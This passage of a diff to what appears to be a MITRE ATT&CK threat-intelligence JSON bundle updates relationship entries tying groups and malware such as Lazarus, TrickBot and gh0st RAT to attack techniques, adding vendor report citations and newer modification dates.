"Novetta Blockbuster" }, { - "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", - "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + "source_name": "Novetta Blockbuster Destructive Malware" }, { "source_name": "Novetta Blockbuster Loaders", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.", "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "type": "relationship", - "modified": "2019-12-20T14:28:39.052Z", + "modified": "2020-08-10T13:25:16.354Z", "created": "2017-05-31T21:33:27.067Z" }, { @@ -85657,9 +90828,9 @@ ], "source_ref": "malware--e9595678-d269-469e-ae6b-75e49259de63", "relationship_type": "uses", - "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "type": "relationship", - "modified": "2020-03-16T15:59:20.530Z", + "modified": "2020-08-13T20:14:45.607Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -86428,14 +91599,19 @@ "target_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", "external_references": [ { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], - "description": "(Citation: F-Secure The Dukes)", + "description": "(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)", "type": "relationship", - "modified": "2019-07-25T14:25:53.643Z", + "modified": "2020-10-09T16:07:59.100Z", "created": "2017-05-31T21:33:27.050Z" }, { @@ -86574,7 +91750,7 @@ { "id": "relationship--40c202ae-fd92-4506-b72a-5fb0e7bcf99a", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.(Citation: Symantec Dragonfly)", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -86583,13 +91759,18 @@ "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "relationship_type": "uses", "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "type": "relationship", - "modified": "2020-03-17T15:08:58.250Z", + "modified": "2020-08-13T14:58:25.428Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -87449,7 +92630,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", "type": "relationship", @@ -88018,7 +93199,7 @@ { "id": "relationship--39fdd17c-5f59-4daf-bf14-95841b5ec248", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) uses multiple proxies to obfuscate network traffic from victims.(Citation: US-CERT FALLCHILL Nov 2017)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) uses multiple proxies to obfuscate network traffic from victims.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: TrendMicro macOS Dacls May 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -88027,13 +93208,18 @@ "url": "https://www.us-cert.gov/ncas/alerts/TA17-318A", "description": "US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA \u2013 North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.", "source_name": "US-CERT FALLCHILL Nov 2017" + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "type": "relationship", - "modified": "2020-03-23T16:28:08.237Z", + "modified": "2020-08-10T13:25:16.375Z", "created": "2018-01-16T16:13:52.465Z" }, { @@ -88240,27 +93426,6 @@ "modified": "2020-03-17T00:54:56.969Z", "created": "2018-01-16T16:13:52.465Z" }, - { - "id": "relationship--9d7ac1b2-3fa9-4236-b72d-5565f0c66eab", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Twitoor](https://attack.mitre.org/software/S0302) uses Twitter for command and control.(Citation: ESET-Twitoor)", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "external_references": [ - { - "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/", - "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", - "source_name": "ESET-Twitoor" - } - ], - "source_ref": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", - "relationship_type": "uses", - "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", - "type": "relationship", - "modified": "2020-03-20T21:31:01.454Z", - "created": "2017-12-14T16:46:06.044Z" - }, { "id": "relationship--78da5fc8-6f66-43a5-8ad4-c9c79b506408", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -88736,15 +93901,16 @@ ], "external_references": [ { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", "type": "relationship", - "modified": "2020-03-17T02:22:39.601Z", + "modified": "2020-09-02T18:46:33.049Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -89585,7 +94751,7 @@ { "id": "relationship--b75c08e0-4d11-46dc-a582-ca496352bb1c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) dropped and executed tools used for password cracking, including Hydra.(Citation: US-CERT TA18-074A)(Citation: US-CERT APT Energy Oct 2017)(Citation: Kali Hydra)", + "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) dropped and executed tools used for password cracking, including Hydra and [CrackMapExec](https://attack.mitre.org/software/S0488).(Citation: US-CERT TA18-074A)(Citation: US-CERT APT Energy Oct 2017)(Citation: Kali Hydra)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -89610,7 +94776,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "type": "relationship", - "modified": "2020-03-11T17:20:25.606Z", + "modified": "2020-07-29T20:31:24.104Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -89852,7 +95018,7 @@ { "id": "relationship--ad696f42-0631-43fb-893b-a5616f14f93f", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) is able to wipe event logs.(Citation: FireEye Hacking Team)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) is able to wipe event logs.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -89861,13 +95027,18 @@ "source_name": "FireEye Hacking Team", "description": "FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.", "url": "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html" + }, + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." } ], "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", "relationship_type": "uses", "target_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "type": "relationship", - "modified": "2020-02-18T03:46:25.182Z", + "modified": "2020-07-15T19:28:00.872Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -89922,7 +95093,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "type": "relationship", - "modified": "2020-07-01T18:27:41.884Z", + "modified": "2020-10-21T15:30:45.135Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -91049,7 +96220,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "type": "relationship", @@ -91059,7 +96230,7 @@ { "id": "relationship--7cf7d162-a34f-4951-a643-5bf959283f6b", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create a directory (C:\\ProgramData\\Mail\\MailAg\\gl) to use as a temporary directory for uploading files.(Citation: Symantec Dragonfly)", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create directories to store plugin output and stage data for exfiltration.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -91068,13 +96239,18 @@ "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "relationship_type": "uses", "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "type": "relationship", - "modified": "2020-03-17T15:08:58.247Z", + "modified": "2020-08-13T14:05:45.255Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -91688,7 +96864,7 @@ { "id": "relationship--f7bcd411-995f-41cb-b8ed-c333b0435ed3", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[TrickBot](https://attack.mitre.org/software/S0266) obtains the IP address and other relevant network information from the victim\u2019s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) obtains the IP address, location, and other relevant network information from the victim\u2019s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -91702,13 +96878,18 @@ "description": "Anthony, N., Pascual, C.. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/", "source_name": "Trend Micro Trickbot Nov 2018" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "relationship_type": "uses", "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "type": "relationship", - "modified": "2019-06-24T19:15:06.557Z", + "modified": "2020-09-11T13:27:44.628Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -92122,22 +97303,27 @@ { "id": "relationship--45a1721f-67a3-479a-befe-d136ed0fdad3", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "type": "relationship", - "modified": "2020-03-17T00:09:26.102Z", + "modified": "2020-07-16T15:07:27.322Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -93204,15 +98390,16 @@ ], "external_references": [ { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "type": "relationship", - "modified": "2020-03-18T20:39:26.154Z", + "modified": "2020-09-02T18:46:33.172Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -93365,15 +98552,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "type": "relationship", - "modified": "2020-03-19T19:34:55.497Z", + "modified": "2020-09-02T18:46:33.309Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -95498,27 +100686,6 @@ "modified": "2019-06-24T19:15:06.695Z", "created": "2018-10-17T00:14:20.652Z" }, - { - "id": "relationship--c9e726b6-61c2-4b18-8770-126be9cd1870", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[SDelete](https://attack.mitre.org/software/S0195) is digitally signed by Microsoft.(Citation: Microsoft SDelete July 2016)", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "external_references": [ - { - "source_name": "Microsoft SDelete July 2016", - "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.", - "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" - } - ], - "source_ref": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153", - "relationship_type": "uses", - "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", - "type": "relationship", - "modified": "2019-04-24T00:37:08.750Z", - "created": "2018-04-18T17:59:24.739Z" - }, { "id": "relationship--fa6f0d89-8a80-421b-bcb1-ef5ee31f0879", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -95708,7 +100875,7 @@ { "id": "relationship--af7c56df-ced8-45b7-9aef-be1039e30cea", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[TrickBot](https://attack.mitre.org/software/S0266) decodes the configuration data and modules.(Citation: Fidelis TrickBot Oct 2016)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) decodes the configuration data and modules.(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -95717,13 +100884,18 @@ "source_name": "Fidelis TrickBot Oct 2016", "description": "Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.", "url": "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "relationship_type": "uses", "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "type": "relationship", - "modified": "2019-06-24T19:15:06.708Z", + "modified": "2020-09-11T13:27:44.581Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -95828,9 +101000,9 @@ ], "source_ref": "intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c", "relationship_type": "uses", - "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "type": "relationship", - "modified": "2019-09-09T19:12:32.847Z", + "modified": "2020-08-13T17:53:17.881Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -97458,7 +102630,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", "type": "relationship", @@ -97521,7 +102693,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", "type": "relationship", @@ -98625,7 +103797,7 @@ { "id": "relationship--83bfee39-b6c9-48e6-8114-54b0c623a91f", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.(Citation: McAfee Bankshot)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.(Citation: McAfee Bankshot)(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -98634,13 +103806,18 @@ "url": "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/", "description": "Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.", "source_name": "McAfee Bankshot" + }, + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "type": "relationship", - "modified": "2020-03-17T14:42:24.965Z", + "modified": "2020-09-22T16:26:53.204Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -99500,14 +104677,19 @@ "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "external_references": [ { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], - "description": "(Citation: F-Secure The Dukes)", + "description": "(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)", "type": "relationship", - "modified": "2019-07-25T14:25:53.636Z", + "modified": "2020-10-09T16:07:59.128Z", "created": "2017-05-31T21:33:27.050Z" }, { @@ -99691,14 +104873,19 @@ "target_ref": "malware--b136d088-a829-432c-ac26-5529c26d4c7e", "external_references": [ { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], - "description": "(Citation: F-Secure The Dukes)", + "description": "(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)", "type": "relationship", - "modified": "2019-07-25T14:25:53.641Z", + "modified": "2020-10-09T16:07:59.157Z", "created": "2017-05-31T21:33:27.050Z" }, { @@ -100398,27 +105585,6 @@ "modified": "2020-03-16T17:46:07.792Z", "created": "2017-12-14T16:46:06.044Z" }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "external_references": [ - { - "description": "Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.", - "url": "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", - "source_name": "Nccgroup Gh0st April 2018" - } - ], - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) uses port 443 for C2 communications.(Citation: Nccgroup Gh0st April 2018)", - "id": "relationship--9b99fba6-15bd-4102-bcab-4cdf8e5be334", - "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", - "relationship_type": "uses", - "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", - "type": "relationship", - "modified": "2019-04-16T20:26:40.937Z", - "created": "2019-01-29T14:51:06.840Z" - }, { "id": "relationship--c1421d39-cb5d-4bac-a931-9c641066c0fd", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -100852,19 +106018,24 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/", "source_name": "Trend Micro Trickbot Nov 2018" }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + }, { "source_name": "TrendMicro Trickbot Feb 2019", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "description": "Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019." } ], - "description": "[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from several applications such as Outlook, Filezilla, and WinSCP.(Citation: Trend Micro Trickbot Nov 2018) Additionally, it searches for the \".vnc.lnk\" affix to steal VNC credentials.(Citation: TrendMicro Trickbot Feb 2019)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP.(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019) Additionally, it searches for the \".vnc.lnk\" affix to steal VNC credentials.(Citation: TrendMicro Trickbot Feb 2019)", "id": "relationship--5b2f0fb3-5877-4fa2-bed1-1962423caccd", "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "relationship_type": "uses", "target_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "type": "relationship", - "modified": "2019-06-24T19:15:06.700Z", + "modified": "2020-09-11T13:27:44.572Z", "created": "2019-01-30T14:11:44.244Z" }, { @@ -101566,7 +106737,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "type": "relationship", - "modified": "2020-03-24T23:07:28.481Z", + "modified": "2020-08-03T16:47:37.375Z", "created": "2017-05-31T21:33:27.021Z" }, { @@ -103581,7 +108752,7 @@ "external_references": [ { "source_name": "Wikipedia pwdump", - "description": "Wikipedia. (1985, June 22). pwdump. Retrieved June 22, 2016.", + "description": "Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.", "url": "https://en.wikipedia.org/wiki/Pwdump" } ], @@ -103589,7 +108760,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", 